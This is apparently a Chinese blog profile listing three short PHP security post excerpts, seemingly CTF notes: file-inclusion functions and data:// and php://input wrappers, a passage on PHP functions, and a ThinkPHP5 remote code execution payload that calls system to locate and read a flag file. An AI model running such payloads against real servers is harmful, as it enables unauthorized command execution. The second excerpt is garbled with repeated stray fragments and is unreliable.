php
大漂亮#
这个作者很懒,什么都没留下…
展开
-
文件包含漏洞(一)
1.造成文件包含漏洞的函数通常有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readline 2.data协议 用法: data://text/plain,xxxx(要执行的php代码) data://text/plain;base64,xxxx(base64编码后的数据) 3.php://协议 php://input,用于执行php代码,需要post请原创 2021-01-15 20:12:05 · 207 阅读 · 0 评论 -
php一些函数
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va原创 2021-01-15 18:57:17 · 250 阅读 · 0 评论 -
thinkphp5的漏洞
payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看fla原创 2021-01-15 16:41:42 · 404 阅读 · 0 评论